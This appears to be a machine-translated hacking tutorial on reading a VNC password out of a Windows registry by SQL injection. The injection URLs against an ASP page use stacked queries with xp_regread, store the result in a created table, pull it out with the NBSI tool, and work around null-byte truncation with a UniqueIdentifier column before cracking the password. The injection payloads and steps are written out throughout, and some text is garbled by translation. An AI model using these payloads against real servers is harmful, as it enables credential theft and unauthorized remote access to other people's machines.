http://127.0.0.1/script.asp?id=2; Declare @Result bin ... Er.dbo.xp_regread HKEY_CURRENT_USER, SOFTWARE / ORL / WINVNC3, Password, @Result Output Insert Into Cyfd (GYFD) VALUES (@ Result; -
Then I use the NBSI to run the value of the GYFD in the CYFD table. The result is coming out, the encrypted cryptographic value of VNC is 0x0e3515ac0000000000000000000000000000. But here is not right, I am in this machine's VNC password value in the registration table is HEX: 0E, 35, 15, AC, 00, 62, D3, 08 this. The original binary (n) data storage length is fixed. When the input binary length is less than N, the remaining length is filled in 0 supplements. My binary (20) written in the injection statement is enough to write the length of the VNC encrypted password, why is there so many 0 to populate? This is because my VNC password is a 0E3515AC0062D308. When I have encountered 00, XP_regread thinks that I have read its value, put 00 as a finish, so I only read 0x0e3515ac, I halo! After turning over the book, I finally gave me a special data type UniqueIdentifier, which was used to store a 16-byte long binary data type. Transform the injection statement:
http://127.0.0.1/script.asp?id=2;create table [dbo]. [cyfd] ([GYFD] [UniqueIdentifier];
http://127.0.0.1/script.asp?id=2;DECLARE @result unique ... ster.dbo.xp_regread HKEY_CURRENT_USER, Software / ORL / WinVNC3, Password, @result output insert into cyfd (gyfd) values (@ Result; -
Then run with NBSI, run out, but the result is the AC15350E-6200-08D3-0000-000000000000.
What is the difference between the AC15350E-6200-08D3-0000-000000000000 and I can see if the value of the correct VNC password in the registration table is different than the value of 0e3515ac0062d308? However, the order is reversed, I believe everyone will be the math of elementary school, this doesn't have to teach. Try to break the password of the VNC with ca I, see if it doesn't work.
